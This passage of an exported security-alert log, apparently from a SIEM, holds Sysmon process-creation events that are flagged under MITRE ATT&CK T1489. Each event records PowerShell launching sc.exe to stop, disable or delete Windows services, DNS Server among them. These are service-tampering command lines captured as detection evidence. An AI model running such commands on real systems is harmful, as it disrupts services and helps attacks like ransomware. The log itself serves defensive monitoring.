Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:06.156",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:37.816 +ProcessGuid: {df9fc3d3-b415-5ecf-0000-001077ed3000} +ProcessId: 5128 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config SuperProServer Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config SuperProServer Start= Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:37.826120700Z"",""eventRecordID"":""3908"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:37.816\r\nProcessGuid: {df9fc3d3-b415-5ecf-0000-001077ed3000}\r\nProcessId: 5128\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config SuperProServer Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:37.816"",""processGuid"":""{df9fc3d3-b415-5ecf-0000-001077ed3000}"",""processId"":""5128"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config SuperProServer Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:05.694",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:37.740 +ProcessGuid: {df9fc3d3-b415-5ecf-0000-0010bbeb3000} +ProcessId: 4768 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Serhiez +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Serhiez",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:37.744180600Z"",""eventRecordID"":""3906"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:37.740\r\nProcessGuid: {df9fc3d3-b415-5ecf-0000-0010bbeb3000}\r\nProcessId: 4768\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Serhiez\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:37.740"",""processGuid"":""{df9fc3d3-b415-5ecf-0000-0010bbeb3000}"",""processId"":""4768"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Serhiez"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:05.640",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:37.690 +ProcessGuid: {df9fc3d3-b415-5ecf-0000-00100ee93000} +ProcessId: 2360 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop ""DNS Server"" +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop \""DNS Server\""",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:37.693037200Z"",""eventRecordID"":""3903"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:37.690\r\nProcessGuid: {df9fc3d3-b415-5ecf-0000-00100ee93000}\r\nProcessId: 2360\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop \""DNS Server\""\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:37.690"",""processGuid"":""{df9fc3d3-b415-5ecf-0000-00100ee93000}"",""processId"":""2360"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop \\\""DNS Server\\\"""",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:05.609",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:37.655 +ProcessGuid: {df9fc3d3-b415-5ecf-0000-001058e73000} +ProcessId: 5100 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete Zational +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete Zational",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:37.657741200Z"",""eventRecordID"":""3901"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:37.655\r\nProcessGuid: {df9fc3d3-b415-5ecf-0000-001058e73000}\r\nProcessId: 5100\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete Zational\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:37.655"",""processGuid"":""{df9fc3d3-b415-5ecf-0000-001058e73000}"",""processId"":""5100"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete Zational"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:05.592",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:37.627 +ProcessGuid: {df9fc3d3-b415-5ecf-0000-001010e63000} +ProcessId: 7912 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Zational +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Zational",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:37.634011400Z"",""eventRecordID"":""3900"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:37.627\r\nProcessGuid: {df9fc3d3-b415-5ecf-0000-001010e63000}\r\nProcessId: 7912\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Zational\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:37.627"",""processGuid"":""{df9fc3d3-b415-5ecf-0000-001010e63000}"",""processId"":""7912"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Zational"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:05.560",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:37.477 +ProcessGuid: {df9fc3d3-b415-5ecf-0000-0010e5e23000} +ProcessId: 5272 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop AxInstSV +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop AxInstSV",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:37.481464800Z"",""eventRecordID"":""3897"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:37.477\r\nProcessGuid: {df9fc3d3-b415-5ecf-0000-0010e5e23000}\r\nProcessId: 5272\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop AxInstSV\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:37.477"",""processGuid"":""{df9fc3d3-b415-5ecf-0000-0010e5e23000}"",""processId"":""5272"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop AxInstSV"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:05.410",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:37.267 +ProcessGuid: {df9fc3d3-b415-5ecf-0000-00102adf3000} +ProcessId: 7360 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe 